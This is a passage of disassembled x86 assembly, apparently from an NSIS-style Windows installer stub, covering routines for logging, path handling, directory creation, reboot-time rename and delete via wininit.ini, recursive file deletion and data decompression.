call ds:dword_408084 ; CloseHandle
loc_4060C9: ; CODE XREF: sub_4060AD+13�j
or dword_40A060, 0FFFFFFFFh
jmp short loc_406147
; ---------------------------------------------------------------------------
loc_4060D2: ; CODE XREF: sub_4060AD+9�j
cmp dword_423F78, ebx
jz short loc_406147
cmp byte_425780, bl
jz short loc_406111
cmp dword_40A060, 0FFFFFFFFh
jnz short loc_40611A
push 4
push 40000000h
push offset byte_425780
call sub_405E7A
cmp eax, 0FFFFFFFFh
mov dword_40A060, eax
jz short loc_406147
push 2
push ebx
push ebx
push eax
call ds:dword_40814C ; SetFilePointer
loc_406111: ; CODE XREF: sub_4060AD+33�j
cmp dword_40A060, 0FFFFFFFFh
jz short loc_406147
loc_40611A: ; CODE XREF: sub_4060AD+3C�j
push esi
push offset asc_408C40 ; "\r\n"
mov esi, offset dword_423F80
push esi
call ds:dword_4080A4 ; lstrcat
push ebx
lea eax, [ebp+arg_0]
push eax
push esi
call ds:dword_408108 ; lstrlen
push eax
push esi
push dword_40A060
call ds:dword_408144 ; WriteFile
pop esi
loc_406147: ; CODE XREF: sub_4060AD+23�j
; sub_4060AD+2B�j ...
pop ebx
pop ebp
retn 4
sub_4060AD endp
; =============== S U B R O U T I N E =======================================
sub_40614C proc near ; CODE XREF: sub_401610+68�p
; sub_401610+84�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
lea eax, [esp+arg_4]
push eax
push [esp+4+arg_0]
push offset dword_423F80
call ds:dword_408220 ; wvsprintfA
push 0
call sub_4060AD
retn
sub_40614C endp
; =============== S U B R O U T I N E =======================================
sub_406168 proc near ; CODE XREF: sub_401610+298�p
; sub_401610+34A�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, ds:dword_40806C
push edi
push 8001h
call esi ; SetErrorMode
mov edi, offset dword_423A38
push edi
push [esp+10h+arg_0]
call ds:dword_408158 ; FindFirstFileA
push 0
mov ebx, eax
call esi ; SetErrorMode
cmp ebx, 0FFFFFFFFh
jz short loc_40619E
push ebx
call ds:dword_408150 ; FindClose
mov eax, edi
jmp short loc_4061A0
; ---------------------------------------------------------------------------
loc_40619E: ; CODE XREF: sub_406168+29�j
xor eax, eax
loc_4061A0: ; CODE XREF: sub_406168+34�j
pop edi
pop esi
pop ebx
retn 4
sub_406168 endp
; =============== S U B R O U T I N E =======================================
sub_4061A6 proc near ; CODE XREF: sub_401610+53F�p
; sub_401610+187B�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call ds:dword_408108 ; lstrlen
add eax, esi
push eax
push esi
call ds:dword_40822C ; CharPrevA
cmp byte ptr [eax], 5Ch
jz short loc_4061CD
push offset asc_408558 ; "\\"
push esi
call ds:dword_4080A4 ; lstrcat
loc_4061CD: ; CODE XREF: sub_4061A6+19�j
mov eax, esi
pop esi
retn 4
sub_4061A6 endp
; =============== S U B R O U T I N E =======================================
sub_4061D3 proc near ; CODE XREF: sub_401610+17FB�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call ds:dword_408108 ; lstrlen
mov esi, ds:dword_40822C
add eax, edi
push eax
push edi
call esi ; CharPrevA
test edi, edi
jz short loc_406202
loc_4061F0: ; CODE XREF: sub_4061D3+2D�j
cmp eax, edi
jbe short loc_406202
mov cl, [eax]
cmp cl, [esp+8+arg_4]
jz short loc_406202
push eax
push edi
call esi ; CharPrevA
jmp short loc_4061F0
; ---------------------------------------------------------------------------
loc_406202: ; CODE XREF: sub_4061D3+1B�j
; sub_4061D3+1F�j ...
pop edi
pop esi
retn 8
sub_4061D3 endp
; =============== S U B R O U T I N E =======================================
sub_406207 proc near ; CODE XREF: sub_403756+61�p start+378�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call ds:dword_408108 ; lstrlen
add eax, esi
loc_406215: ; CODE XREF: sub_406207+1D�j
cmp byte ptr [eax], 5Ch
jz short loc_406226
push eax
push esi
call ds:dword_40822C ; CharPrevA
cmp eax, esi
ja short loc_406215
loc_406226: ; CODE XREF: sub_406207+11�j
mov byte ptr [eax], 0
pop esi
retn 4
sub_406207 endp
; =============== S U B R O U T I N E =======================================
sub_40622D proc near ; CODE XREF: start+282�p
; sub_40463C+1DA�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, offset dword_423238
push esi
call ds:dword_408104 ; lstrcpy
push esi
call sub_405E0D
test eax, eax
jnz short loc_40624C
loc_406248: ; CODE XREF: sub_40622D+2C�j
; sub_40622D+31�j
xor eax, eax
jmp short loc_4062A3
; ---------------------------------------------------------------------------
loc_40624C: ; CODE XREF: sub_40622D+19�j
test byte ptr dword_426444, 80h
jz short loc_406260
mov cl, [eax]
test cl, cl
jz short loc_406248
cmp cl, 5Ch
jz short loc_406248
loc_406260: ; CODE XREF: sub_40622D+26�j
push ebx
mov ebx, ds:dword_408108
push edi
mov edi, eax
sub edi, esi
jmp short loc_406283
; ---------------------------------------------------------------------------
loc_40626E: ; CODE XREF: sub_40622D+5B�j
push esi
call sub_406168
test eax, eax
jz short loc_40627D
test byte ptr [eax], 10h
jz short loc_4062A7
loc_40627D: ; CODE XREF: sub_40622D+49�j
push esi
call sub_406207
loc_406283: ; CODE XREF: sub_40622D+3F�j
push esi
call ebx ; lstrlen
cmp eax, edi
jg short loc_40626E
push esi
call sub_4061A6
push esi
call ds:dword_40808C ; GetFileAttributesA
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
loc_4062A1: ; CODE XREF: sub_40622D+7C�j
pop edi
pop ebx
loc_4062A3: ; CODE XREF: sub_40622D+1D�j
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4062A7: ; CODE XREF: sub_40622D+4E�j
xor eax, eax
jmp short loc_4062A1
sub_40622D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062AB proc near ; CODE XREF: sub_406357+155�p
; sub_406357+18F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push [ebp+arg_4]
mov edi, ds:dword_408108
call edi ; lstrlen
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_4062EC
; ---------------------------------------------------------------------------
loc_4062C5: ; CODE XREF: sub_4062AB+47�j
mov eax, [ebp+var_4]
push [ebp+arg_4]
mov bl, [eax+esi]
push esi
mov byte ptr [eax+esi], 0
call ds:dword_408080 ; lstrcmpi
test eax, eax
mov eax, [ebp+var_4]
mov [eax+esi], bl
jz short loc_4062FD
push esi
call ds:dword_408198 ; CharNextA
mov esi, eax
loc_4062EC: ; CODE XREF: sub_4062AB+18�j
push esi
call edi ; lstrlen
cmp eax, [ebp+var_4]
jge short loc_4062C5
xor eax, eax
loc_4062F6: ; CODE XREF: sub_4062AB+54�j
pop edi
pop esi
pop ebx
leave
retn 8
; ---------------------------------------------------------------------------
loc_4062FD: ; CODE XREF: sub_4062AB+36�j
mov eax, esi
jmp short loc_4062F6
sub_4062AB endp
; =============== S U B R O U T I N E =======================================
sub_406301 proc near ; CODE XREF: sub_401610+253�p
; sub_401610+4E9�p ...
arg_0 = dword ptr 4
push ebp
push esi
push edi
mov edi, [esp+0Ch+arg_0]
push edi
call sub_405E0D
mov esi, eax
xor ebp, ebp
test esi, esi
jz short loc_40634A
push ebx
loc_406317: ; CODE XREF: sub_406301+46�j
push 5Ch
push esi
call sub_405DCA
mov esi, eax
mov bl, [esi]
push edi
mov byte ptr [esi], 0
call sub_406168
test eax, eax
jnz short loc_40633C
push eax
push edi
call ds:dword_4080C4 ; CreateDirectoryA
test eax, eax
jmp short loc_40633F
; ---------------------------------------------------------------------------
loc_40633C: ; CODE XREF: sub_406301+2D�j
test byte ptr [eax], 10h
loc_40633F: ; CODE XREF: sub_406301+39�j
jnz short loc_406342
inc ebp
loc_406342: ; CODE XREF: sub_406301:loc_40633F�j
mov [esi], bl
inc esi
test bl, bl
jnz short loc_406317
pop ebx
loc_40634A: ; CODE XREF: sub_406301+13�j
pop edi
xor eax, eax
test ebp, ebp
pop esi
setz al
pop ebp
retn 4
sub_406301 endp
; =============== S U B R O U T I N E =======================================
sub_406357 proc near ; CODE XREF: sub_401610+357�p
; start+35C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10h
push ebx
push ebp
push esi
push edi
push offset aKernel32_dll ; "KERNEL32.dll"
call ds:dword_408068 ; GetModuleHandleA
test eax, eax
mov esi, [esp+20h+arg_4]
jz short loc_406392
push offset aMovefileexa ; "MoveFileExA"
push eax
call ds:dword_40812C ; GetProcAddress
test eax, eax
jz short loc_406392
push 5
push esi
push [esp+28h+arg_0]
call eax
test eax, eax
jnz loc_4065A7
loc_406392: ; CODE XREF: sub_406357+18�j
; sub_406357+28�j
test esi, esi
mov ebp, ds:dword_408098
mov dword_423638, 4C554Eh
mov edi, 400h
jz short loc_4063D7
push 1
push 0
push esi
call sub_405E7A
push eax
call ds:dword_408084 ; CloseHandle
push edi
mov ebx, offset dword_423638
push ebx
push esi
call ebp ; GetShortPathNameA
test eax, eax
jz loc_4065AD
cmp eax, edi
jle short loc_4063E8
jmp loc_4065AD
; ---------------------------------------------------------------------------
loc_4063D7: ; CODE XREF: sub_406357+52�j
push offset aNul ; "NUL"
mov ebx, offset dword_423638
push ebx
call ds:dword_408104 ; lstrcpy
loc_4063E8: ; CODE XREF: sub_406357+79�j
push edi
mov esi, offset dword_422DF0
push esi
push [esp+28h+arg_0]
call ebp ; GetShortPathNameA
xor ebp, ebp
cmp eax, ebp
jz loc_4065AD
cmp eax, edi
jg loc_4065AD
push esi
push ebx
push offset aSS_0 ; "%s=%s\r\n"
push offset dword_4229F0
call ds:dword_408230 ; wsprintfA
add esp, 10h
push 3F0h
push esi
mov ebx, eax
call ds:dword_4080DC ; GetWindowsDirectoryA
push offset aWininit_ini ; "\\wininit.ini"
push esi
call ds:dword_4080A4 ; lstrcat
push ebp
push 8000080h
push 4
push ebp
push ebp
push 0C0000000h
push esi
call ds:dword_4080B8 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [esp+20h+var_10], edi
jz loc_4065A7
push ebp
push edi
call ds:dword_4080BC ; GetFileSize
mov esi, eax
xor ecx, ecx
push ecx
lea ebp, [esi+ebx]
lea eax, [ebp+0Ah]
push eax
push ecx
push 4
push ecx
push edi
mov [esp+38h+var_4], ebp
mov [esp+38h+var_C], eax
call ds:dword_408118 ; CreateFileMappingA
xor ecx, ecx
cmp eax, ecx
mov [esp+20h+arg_4], eax
jz loc_40658F
push ecx
push ecx
push ecx
push 2
push eax
call ds:dword_408114 ; MapViewOfFile
mov edi, eax
test edi, edi
jz loc_40657F
push offset aRename ; "[Rename]\r\n"
push edi
call sub_4062AB
test eax, eax
jnz short loc_4064DD
push offset aRename ; "[Rename]\r\n"
lea eax, [edi+esi]
push eax
call ds:dword_408104 ; lstrcpy
push ebx
add esi, 0Ah
push offset dword_4229F0
lea eax, [edi+esi]
push eax
call sub_405E5A
add esi, ebx
jmp loc_406578
; ---------------------------------------------------------------------------
loc_4064DD: ; CODE XREF: sub_406357+15C�j
push offset asc_408C44 ; "\n["
add eax, 0Ah
push eax
call sub_4062AB
test eax, eax
jz short loc_406567
push [esp+20h+var_C]
inc eax
push 40h
mov [esp+28h+var_8], eax
mov [esp+28h+arg_0], eax
call ds:dword_4080F4 ; GlobalAlloc
mov ebp, eax
test ebp, ebp
jz short loc_40654C
push offset dword_4229F0
push ebp
call ds:dword_408104 ; lstrcpy
lea ecx, [edi+esi]
mov esi, [esp+20h+var_8]
add ebx, ebp
sub ebx, esi
loc_406521: ; CODE XREF: sub_406357+1DC�j
mov eax, [esp+20h+arg_0]
cmp eax, ecx
jnb short loc_406535
mov dl, [eax]
mov [ebx+eax], dl
inc eax
mov [esp+20h+arg_0], eax
jmp short loc_406521
; ---------------------------------------------------------------------------
loc_406535: ; CODE XREF: sub_406357+1D0�j
sub eax, esi
push eax
push ebp
push esi
call sub_405E5A
mov esi, [esp+20h+var_4]
push ebp
call ds:dword_40813C ; GlobalFree
jmp short loc_406578
; ---------------------------------------------------------------------------
loc_40654C: ; CODE XREF: sub_406357+1B1�j
push edi
call ds:dword_408110 ; UnmapViewOfFile
push [esp+20h+arg_4]
mov esi, ds:dword_408084
call esi ; CloseHandle
push [esp+20h+var_10]
call esi ; CloseHandle
jmp short loc_4065AD
; ---------------------------------------------------------------------------
loc_406567: ; CODE XREF: sub_406357+196�j
push ebx
push offset dword_4229F0
lea eax, [edi+esi]
push eax
call sub_405E5A
mov esi, ebp
loc_406578: ; CODE XREF: sub_406357+181�j
; sub_406357+1F3�j
push edi
call ds:dword_408110 ; UnmapViewOfFile
loc_40657F: ; CODE XREF: sub_406357+149�j
push [esp+20h+arg_4]
call ds:dword_408084 ; CloseHandle
mov edi, [esp+20h+var_10]
xor ecx, ecx
loc_40658F: ; CODE XREF: sub_406357+133�j
push ecx
push ecx
push esi
push edi
call ds:dword_40814C ; SetFilePointer
push edi
call ds:dword_40810C ; SetEndOfFile
push edi
call ds:dword_408084 ; CloseHandle
loc_4065A7: ; CODE XREF: sub_406357+35�j
; sub_406357+FE�j
inc dword_426470
loc_4065AD: ; CODE XREF: sub_406357+71�j
; sub_406357+7B�j ...
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn 8
sub_406357 endp
; =============== S U B R O U T I N E =======================================
sub_4065B7 proc near ; CODE XREF: sub_4014F2+A�p
; sub_401508+23�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 14h
push ebp
mov ebp, [esp+18h+arg_4]
test ebp, ebp
push esi
jge short loc_4065D5
mov ecx, dword_425BC8
lea eax, ds:4[ebp*4]
sub ecx, eax
mov ebp, [ecx]
loc_4065D5: ; CODE XREF: sub_4065B7+B�j
mov eax, dword_426418
mov ecx, [esp+1Ch+arg_0]
add ebp, eax
mov eax, offset byte_424F80
sub ecx, eax
cmp ecx, 800h
mov esi, eax
jnb short loc_4065FA
mov esi, [esp+1Ch+arg_0]
and [esp+1Ch+arg_0], 0
loc_4065FA: ; CODE XREF: sub_4065B7+38�j
mov dl, [ebp+0]
test dl, dl
jz loc_4067C4
push ebx
push edi
loc_406607: ; CODE XREF: sub_4065B7+205�j
mov ecx, esi
sub ecx, eax
cmp ecx, 400h
jge loc_4067C2
inc ebp
cmp dl, 0FCh
jbe loc_4067A4
movsx eax, byte ptr [ebp+1]
movsx ecx, byte ptr [ebp+0]
mov edi, eax
and edi, 7Fh
mov ebx, ecx
and ebx, 7Fh
shl edi, 7
or edi, ebx
mov ebx, 8000h
mov [esp+24h+var_10], ecx
or ecx, ebx
mov [esp+24h+var_8], eax
or eax, ebx
inc ebp
inc ebp
cmp dl, 0FEh
mov [esp+24h+var_C], ecx
mov [esp+24h+var_4], eax
jnz loc_40674E
xor edi, edi
cmp [esp+24h+var_8], 4
mov [esp+24h+arg_4], edi
mov byte ptr [esi], 0
jnz short loc_406677
push 2
mov [esp+28h+arg_4], offset aMicrosoftInter ; "\\Microsoft\\Internet Explorer\\Quick Laun"...
pop edi
loc_406677: ; CODE XREF: sub_4065B7+B3�j
mov ebx, [esp+24h+var_10]
cmp ebx, 2Bh
jnz short loc_406695
push esi
push offset aCommonfilesdir ; "CommonFilesDir"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_405EF1
loc_406695: ; CODE XREF: sub_4065B7+C7�j
cmp ebx, 26h
jnz short loc_4066C0
push esi
push offset aProgramfilesdi ; "ProgramFilesDir"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_405EF1
cmp byte ptr [esi], 0
jnz short loc_406731
push offset aCProgramFiles ; "C:\\Program Files"
push esi
call ds:dword_408104 ; lstrcpy
loc_4066C0: ; CODE XREF: sub_4065B7+E1�j
cmp ebx, 25h
jnz short loc_4066D1
push 400h
push esi
call ds:dword_40811C ; GetSystemDirectoryA
loc_4066D1: ; CODE XREF: sub_4065B7+10C�j
cmp ebx, 24h
jnz short loc_4066E2
push 400h
push esi
call ds:dword_4080DC ; GetWindowsDirectoryA
loc_4066E2: ; CODE XREF: sub_4065B7+11D�j
cmp byte ptr [esi], 0
jnz short loc_406731
cmp dword_426464, 0
push 4
pop edi
jnz short loc_4066F8
push 2
pop edi
jmp short loc_406731
; ---------------------------------------------------------------------------
loc_4066F8: ; CODE XREF: sub_4065B7+13A�j
; sub_4065B7+17C�j
lea eax, [esp+24h+var_14]
push eax
push [esp+edi*4+28h+var_14]
dec edi
push dword_4263E0
call ds:dword_408170
test eax, eax
jnz short loc_40672E
push esi
push [esp+28h+var_14]
call ds:dword_408178
push [esp+24h+var_14]
mov ebx, eax
call sub_405CD6
test ebx, ebx
jnz short loc_406735
jmp short loc_406731
; ---------------------------------------------------------------------------
loc_40672E: ; CODE XREF: sub_4065B7+159�j
mov byte ptr [esi], 0
loc_406731: ; CODE XREF: sub_4065B7+FB�j
; sub_4065B7+12E�j ...
test edi, edi
jnz short loc_4066F8
loc_406735: ; CODE XREF: sub_4065B7+173�j
cmp byte ptr [esi], 0
jz short loc_406780
cmp [esp+24h+arg_4], 0
jz short loc_406780
push [esp+24h+arg_4]
push esi
call ds:dword_4080A4 ; lstrcat
jmp short loc_406780
; ---------------------------------------------------------------------------
loc_40674E: ; CODE XREF: sub_4065B7+9F�j
cmp dl, 0FDh
jnz short loc_406791
cmp edi, 1Bh
jnz short loc_406766
push dword_4263E0
push esi
call sub_405F5B
jmp short loc_406778
; ---------------------------------------------------------------------------
loc_406766: ; CODE XREF: sub_4065B7+19F�j
mov eax, edi
shl eax, 0Ah
add eax, offset dword_427000
push eax
push esi
call ds:dword_408104 ; lstrcpy
loc_406778: ; CODE XREF: sub_4065B7+1AD�j
add edi, 0FFFFFFEBh
cmp edi, 6
jnb short loc_406786
loc_406780: ; CODE XREF: sub_4065B7+181�j
; sub_4065B7+188�j ...
push esi
call sub_406009
loc_406786: ; CODE XREF: sub_4065B7+1C7�j
; sub_4065B7+1EB�j
push esi
call ds:dword_408108 ; lstrlen
add esi, eax
jmp short loc_4067B2
; ---------------------------------------------------------------------------
loc_406791: ; CODE XREF: sub_4065B7+19A�j
cmp dl, 0FFh
jnz short loc_4067B2
or eax, 0FFFFFFFFh
sub eax, edi
push eax
push esi
call sub_4065B7
jmp short loc_406786
; ---------------------------------------------------------------------------
loc_4067A4: ; CODE XREF: sub_4065B7+64�j
jnz short loc_4067AF
mov al, [ebp+0]
mov [esi], al
inc esi
inc ebp
jmp short loc_4067B2
; ---------------------------------------------------------------------------
loc_4067AF: ; CODE XREF: sub_4065B7:loc_4067A4�j
mov [esi], dl
inc esi
loc_4067B2: ; CODE XREF: sub_4065B7+1D8�j
; sub_4065B7+1DD�j ...
mov dl, [ebp+0]
test dl, dl
mov eax, offset byte_424F80
jnz loc_406607
loc_4067C2: ; CODE XREF: sub_4065B7+5A�j
pop edi
pop ebx
loc_4067C4: ; CODE XREF: sub_4065B7+48�j
cmp [esp+1Ch+arg_0], 0
mov byte ptr [esi], 0
pop esi
pop ebp
jz short loc_4067E0
push 400h
push eax
push [esp+1Ch+arg_0]
call ds:dword_4080D4 ; lstrcpyn
loc_4067E0: ; CODE XREF: sub_4065B7+217�j
add esp, 14h
retn 8
sub_4065B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067E6 proc near ; CODE XREF: sub_401610+795�p
; sub_403A96+36�p ...
var_144 = dword ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 144h
push ebx
mov ebx, [ebp+arg_0]
push ebx
call sub_40622D
mov ecx, [ebp+arg_4]
test cl, 8
mov [ebp+var_4], eax
jz short loc_40681B
push ebx
call ds:dword_408128 ; DeleteFileA
neg eax
sbb eax, eax
inc eax
add dword_426468, eax
jmp loc_4069D6
; ---------------------------------------------------------------------------
loc_40681B: ; CODE XREF: sub_4067E6+1C�j
mov [ebp+arg_0], ecx
and [ebp+arg_0], 1
push esi
jz short loc_406836
test eax, eax
jz loc_4069D5
test cl, 2
jz loc_40696C
loc_406836: ; CODE XREF: sub_4067E6+3D�j
push edi
push ebx
mov esi, offset dword_423B78
push esi
call ds:dword_408104 ; lstrcpy
cmp [ebp+arg_0], 0
mov edi, ds:dword_4080A4
jz short loc_40685A
push offset a_ ; "\\*.*"
push esi
call edi ; lstrcat
jmp short loc_406860
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_4067E6+68�j
push ebx
call sub_406207
loc_406860: ; CODE XREF: sub_4067E6+72�j
push offset asc_408558 ; "\\"
push ebx
call edi ; lstrcat
push ebx
call ds:dword_408108 ; lstrlen
mov edi, eax
lea eax, [ebp+var_144]
push eax
push esi
add edi, ebx
call ds:dword_408158 ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_406961
loc_40688C: ; CODE XREF: sub_4067E6+16E�j
cmp [ebp+var_118], 2Eh
jnz short loc_4068AF
cmp [ebp+var_117], 2Eh
jz loc_406944
cmp [ebp+var_117], 0
jz loc_406944
loc_4068AF: ; CODE XREF: sub_4067E6+AD�j
lea eax, [ebp+var_118]
push eax
push edi
call ds:dword_408104 ; lstrcpy
test byte ptr [ebp+var_144], 10h
jz short loc_4068DB
mov eax, [ebp+arg_4]
and eax, 3
cmp al, 3
jnz short loc_406944
push [ebp+arg_4]
push ebx
call sub_4067E6
jmp short loc_406944
; ---------------------------------------------------------------------------
loc_4068DB: ; CODE XREF: sub_4067E6+DE�j
push ebx
push offset aDeleteDeletefi ; "Delete: DeleteFile(\"%s\")"
call sub_40614C
mov eax, [ebp+var_144]
pop ecx
pop ecx
and eax, 0FFFFFFFEh
push eax
push ebx
call ds:dword_4080AC ; SetFileAttributesA
push ebx
call ds:dword_408128 ; DeleteFileA
test eax, eax
push ebx
jnz short loc_40693D
test byte ptr [ebp+arg_4], 4
jz short loc_406929
push offset aDeleteDelete_0 ; "Delete: DeleteFile on Reboot(\"%s\")"
call sub_40614C
pop ecx
pop ecx
push ebx
push 0FFFFFFF1h
call sub_40509F
push 0
push ebx
call sub_406357
jmp short loc_406944
; ---------------------------------------------------------------------------
loc_406929: ; CODE XREF: sub_4067E6+123�j
push offset aDeleteDelete_1 ; "Delete: DeleteFile failed(\"%s\")"
call sub_40614C
inc dword_426468
pop ecx
pop ecx
jmp short loc_406944
; ---------------------------------------------------------------------------
loc_40693D: ; CODE XREF: sub_4067E6+11D�j
push 0FFFFFFF2h
call sub_40509F
loc_406944: ; CODE XREF: sub_4067E6+B6�j
; sub_4067E6+C3�j ...
lea eax, [ebp+var_144]
push eax
push esi
call ds:dword_408154 ; FindNextFileA
test eax, eax
jnz loc_40688C
push esi
call ds:dword_408150 ; FindClose
loc_406961: ; CODE XREF: sub_4067E6+A0�j
cmp [ebp+arg_0], 0
jz short loc_40696B
mov byte ptr [edi-1], 0
loc_40696B: ; CODE XREF: sub_4067E6+17F�j
pop edi
loc_40696C: ; CODE XREF: sub_4067E6+4A�j
xor esi, esi
cmp [ebp+var_4], esi
jz short loc_4069D5
cmp [ebp+arg_0], esi
jz short loc_4069D5
push ebx
call sub_4061A6
push ebx
push offset aRmdirRemovedir ; "RMDir: RemoveDirectory(\"%s\")"
call sub_40614C
pop ecx
pop ecx
push ebx
call ds:dword_408120 ; RemoveDirectoryA
test eax, eax
push ebx
jnz short loc_4069CE
test byte ptr [ebp+arg_4], 4
jz short loc_4069BA
push offset aRmdirRemoved_0 ; "RMDir: RemoveDirectory on Reboot(\"%s\")"
call sub_40614C
pop ecx
pop ecx
push ebx
push 0FFFFFFF1h
call sub_40509F
push esi
push ebx
call sub_406357
jmp short loc_4069D5
; ---------------------------------------------------------------------------
loc_4069BA: ; CODE XREF: sub_4067E6+1B5�j
push offset aRmdirRemoved_1 ; "RMDir: RemoveDirectory failed(\"%s\")"
call sub_40614C
inc dword_426468
pop ecx
pop ecx
jmp short loc_4069D5
; ---------------------------------------------------------------------------
loc_4069CE: ; CODE XREF: sub_4067E6+1AF�j
push 0FFFFFFE5h
call sub_40509F
loc_4069D5: ; CODE XREF: sub_4067E6+41�j
; sub_4067E6+18B�j ...
pop esi
loc_4069D6: ; CODE XREF: sub_4067E6+30�j
pop ebx
leave
retn 8
sub_4067E6 endp
; =============== S U B R O U T I N E =======================================
sub_4069DB proc near ; CODE XREF: sub_403756+1E5�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 80h
loc_4069E4: ; CODE XREF: sub_4069DB+E�j
dec ecx
mov byte ptr [ecx+eax], 0
jnz short loc_4069E4
or dword ptr [eax+78h], 0FFFFFFFFh
xor ecx, ecx
inc ecx
mov [eax+68h], ecx
mov [eax+64h], ecx
mov [eax+60h], ecx
mov [eax+5Ch], ecx
retn
sub_4069DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4069FF proc near ; CODE XREF: sub_403420+13F�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 8Ch
push esi
mov esi, [ebp+74h+arg_0]
push edi
push 22h
pop ecx
lea edi, [ebp+74h+var_88]
rep movsd
cmp [ebp+74h+var_30], 0FFFFFFFFh
jnz short loc_406A25
xor eax, eax
inc eax
jmp loc_4073FD
; ---------------------------------------------------------------------------
loc_406A25: ; CODE XREF: sub_4069FF+1C�j
mov esi, [ebp+74h+var_54]
push ebx
mov ebx, [ebp+74h+var_44]
loc_406A2C: ; CODE XREF: sub_4069FF+54A�j
; sub_4069FF+879�j
mov eax, [ebp+74h+var_88]
cmp eax, 1Ch ; switch 29 cases
ja loc_4073F9 ; default
jmp ds:off_407404[eax*4] ; switch jump
loc_406A3F: ; DATA XREF: .text:off_407404�o
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 0
jz loc_4073EA
mov eax, [ebp+74h+var_70]
dec [ebp+74h+var_6C]
mov al, [eax]
inc [ebp+74h+var_70]
cmp al, 0E1h
ja loc_4073F9 ; default
movzx eax, al
cdq
push 2Dh
pop ecx
idiv ecx
push 9
pop ecx
mov esi, eax
movzx eax, dl
cdq
idiv ecx
mov ecx, esi
movzx edi, dl
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
mov [ebp+74h+var_3C], edi
dec edx
mov [ebp+74h+var_1C], edx
xor edx, edx
inc edx
shl edx, cl
lea ecx, [edi+esi]
mov esi, 300h
shl esi, cl
dec edx
mov [ebp+74h+var_18], edx
add esi, 736h
lea edi, [esi+esi]
cmp edi, [ebp+74h+var_78]
jz short loc_406AC7
cmp [ebp+74h+var_4], 0
jz short loc_406AB3
push [ebp+74h+var_4]
call ds:dword_40813C ; GlobalFree
loc_406AB3: ; CODE XREF: sub_4069FF+A9�j
push edi
call sub_405DBB
test eax, eax
mov [ebp+74h+var_4], eax
jz loc_4073F9 ; default
mov [ebp+74h+var_78], edi
loc_406AC7: ; CODE XREF: sub_4069FF+A3�j
test esi, esi
jz short loc_406AD7
loc_406ACB: ; CODE XREF: sub_4069FF+D6�j
mov eax, [ebp+74h+var_4]
dec esi
mov word ptr [eax+esi*2], 400h
jnz short loc_406ACB
loc_406AD7: ; CODE XREF: sub_4069FF+CA�j
and [ebp+74h+var_48], 0
and [ebp+74h+var_40], 0
jmp short loc_406B05
; ---------------------------------------------------------------------------
loc_406AE1: ; CODE XREF: sub_4069FF+39�j
; sub_4069FF+10A�j
; DATA XREF: ...
cmp [ebp+74h+var_6C], 0 ; jumptable 00406A38 case 1
jz loc_40737A
mov eax, [ebp+74h+var_70]
mov ecx, [ebp+74h+var_48]
movzx eax, byte ptr [eax]
dec [ebp+74h+var_6C]
shl ecx, 3
shl eax, cl
or [ebp+74h+var_40], eax
inc [ebp+74h+var_70]
inc [ebp+74h+var_48]
loc_406B05: ; CODE XREF: sub_4069FF+E0�j
cmp [ebp+74h+var_48], 4
jl short loc_406AE1 ; jumptable 00406A38 case 1
mov eax, [ebp+74h+var_40]
cmp eax, [ebp+74h+var_74]
jz short loc_406B38
cmp [ebp+74h+var_8], 0
mov [ebp+74h+var_74], eax
jz short loc_406B25
push [ebp+74h+var_8]
call ds:dword_40813C ; GlobalFree
loc_406B25: ; CODE XREF: sub_4069FF+11B�j
